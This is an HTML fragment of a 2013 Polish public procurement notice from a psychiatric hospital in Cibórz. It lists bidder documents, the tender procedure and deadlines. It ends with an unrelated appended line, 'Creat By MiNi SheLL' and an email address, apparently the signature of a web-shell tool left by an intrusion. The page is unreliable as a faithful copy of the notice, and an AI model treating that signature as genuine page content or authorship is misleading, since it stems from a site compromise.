<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia tego warunku Wykonawca winien złożyć oświadczenie z art. 22 ust. 1 pkt. 4 ustawy Prawo zamówień publicznych. Ocena spełniania warunków udziału w postępowaniu zostaną dokonane zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w oświadczeniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ciborz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych, Samodzielny Publiczny Zakład Opieki Zdrowotnej w Ciborzu Adres: Cibórz, 66-213 Skąpe.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2013 godzina 11:00, miejsce: Wojewódzki Szpital Specjalistyczny dla Nerwowo i Psychicznie Chorych, Samodzielny Publiczny Zakład Opieki Zdrowotnej w Ciborzu - Sekretariat Dyrektora Szpitala Adres: Cibórz, 66-213 Skąpe.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com